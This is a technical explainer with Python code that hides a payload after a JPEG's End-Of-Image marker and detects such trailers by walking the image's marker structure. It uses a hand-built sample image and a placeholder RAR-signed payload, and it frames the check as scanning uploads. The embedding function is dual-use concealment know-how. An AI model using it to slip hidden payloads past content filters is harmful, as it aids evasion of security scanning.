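The simplest way to carry an archive inside a JPEG is to append it after the End-Of-Image marker: decoders stop at EOI and ignore what follows. Detecting that reliably is less simple than searching for the last FF D9, because an EXIF thumbnail is itself a complete JPEG with its own EOI. The added example below (not David Buchanan's code) embeds a payload after EOI and finds such trailers by walking the marker structure, including the stuffed-byte and restart-marker rules that govern entropy-coded data. The tiny JPEG is constructed by hand: its marker layout is correct but it is not a viewable picture.

```python
"""Append a payload after a JPEG's EOI marker (the trick used to hide an
archive inside an image) and detect such trailers by walking the JPEG
segment structure instead of searching for the first or last FF D9. Added
example, not David Buchanan's code; the tiny JPEG below is constructed by
hand and is not a valid picture, only a correct marker structure."""


def jpeg_end_offset(data):
    """Offset just past the EOI marker, found by walking segments. Inside the
    entropy-coded data after SOS, FF is either stuffed (FF 00) or a restart
    marker (FF D0..D7); any other FF xx is a real marker."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI")
    i, n = 2, len(data)
    while i < n:
        if data[i] != 0xFF:
            raise ValueError("expected marker at offset %d" % i)
        while i < n and data[i] == 0xFF:   # FF fill bytes before a marker
            i += 1
        if i >= n:
            break
        marker = data[i]
        i += 1
        if marker == 0xD9:                 # EOI
            return i
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:
            continue                       # standalone markers carry no length
        if i + 2 > n:
            break
        i += int.from_bytes(data[i:i + 2], "big")   # length includes itself
        if marker == 0xDA:                 # SOS: skip entropy-coded data
            while i + 1 < n and not (data[i] == 0xFF and data[i + 1] != 0x00
                                     and not 0xD0 <= data[i + 1] <= 0xD7):
                i += 1
    raise ValueError("no EOI marker found")


def trailing_payload(data):
    """Bytes that follow the EOI marker; empty for a clean file."""
    return data[jpeg_end_offset(data):]


def embed_after_eoi(jpeg, payload):
    """Return the image with payload appended after EOI (any existing trailer dropped)."""
    return jpeg[:jpeg_end_offset(jpeg)] + payload


def classify_trailer(trailer):
    """Name the container type of a trailer by its magic bytes."""
    if trailer.startswith(b"Rar!\x1a\x07"):
        return "rar"
    if trailer.startswith(b"PK\x03\x04"):
        return "zip"
    return "unknown" if trailer else "none"


def naive_trailer(data):
    """The shortcut that fails: an EXIF thumbnail is itself a JPEG with its own
    EOI, so the first FF D9 in the file is not the end of the image."""
    return data[data.find(b"\xff\xd9") + 2:]


# Constructed minimal JPEG: SOI, APP0 (JFIF), APP1 holding a 4-byte inner
# "thumbnail" JPEG, a one-component SOS whose entropy data contains a stuffed
# FF 00 and an RST0 marker, then EOI. Total length 53 bytes.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xe1\x00\x0cExif\x00\x00\xff\xd8\xff\xd9"
    + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
    + b"\x12\xff\x00\x34\xff\xd0\x56"
    + b"\xff\xd9"
)
# Constructed payload with a RAR signature (not a real archive).
SAMPLE_PAYLOAD = b"Rar!\x1a\x07\x00" + b"<html>Shakespeare would go here</html>"

if __name__ == "__main__":
    stego = embed_after_eoi(SAMPLE_JPEG, SAMPLE_PAYLOAD)
    trailer = trailing_payload(stego)
    print("image ends at", jpeg_end_offset(stego), "trailer type", classify_trailer(trailer))
    print("naive search would report", len(naive_trailer(stego)), "trailing bytes")
```

Whether a given service preserves such a trailer depends on whether it re-encodes uploads or passes the original bytes through; the check above only tells you that trailing data is present and what it looks like, which is the right place to start when scanning images at an upload boundary.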
